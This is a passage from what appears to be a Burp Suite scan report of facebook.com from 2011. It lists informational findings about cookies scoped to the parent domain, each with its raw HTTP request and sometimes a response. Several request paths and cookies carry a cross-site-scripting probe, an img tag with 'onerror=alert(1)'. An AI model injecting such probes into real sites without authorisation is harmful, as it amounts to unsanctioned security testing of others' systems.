10.11. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=hrTlo; path=/; domain=.facebook.com
reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/11
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

10.12. http://www.facebook.com/10000082482078341583 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.13. http://www.facebook.com/10000082482078341583ab0e5e0e0bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.14. http://www.facebook.com/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/1242845259

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; wd=1022x1007

Response

10.15. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; wd=1022x1007

Response

10.16. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.67
Connection: close
Date: Thu, 05 May 2011 11:40:11 GMT
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.17. http://www.facebook.com/AOLrealestate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/AOLrealestate

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AOLrealestate HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.18. http://www.facebook.com/BPAmerica previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BPAmerica

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BPAmerica HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

10.19. http://www.facebook.com/DailyFinance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/DailyFinance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DailyFinance HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.20. http://www.facebook.com/HockeyKen previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/HockeyKen

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HockeyKen HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.39
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 79629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.21. http://www.facebook.com/KickIceForever previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/KickIceForever

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /KickIceForever HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.43
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 72255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.22. http://www.facebook.com/LadyBonesie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/LadyBonesie

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LadyBonesie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.23. http://www.facebook.com/Loizza previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/Loizza

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Loizza HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.69
Connection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 228078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.24. http://www.facebook.com/aim previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aim

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aim HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.25. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.26. http://www.facebook.com/ajax/reg_birthday_help.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/reg_birthday_help.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/reg_birthday_help.php?__a=1&__d=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
X-SVN-Rev: 374220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 707
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.52.163.55
X-Cnection: close
Date: Thu, 05 May 2011 11:43:24 GMT

for (;;);{"__ar":1,"payload":{"secure":false,"title":{"__html":"Why do I need to provide my birthday?"},"className":"birthday_warning_popup","body":{"__html":"Facebook requires all users to provide th
...[SNIP]...

10.27. http://www.facebook.com/ajax/register/logging.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/register/logging.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ajax/register/logging.php?__a=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
Origin: http://www.facebook.com
X-SVN-Rev: 374220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
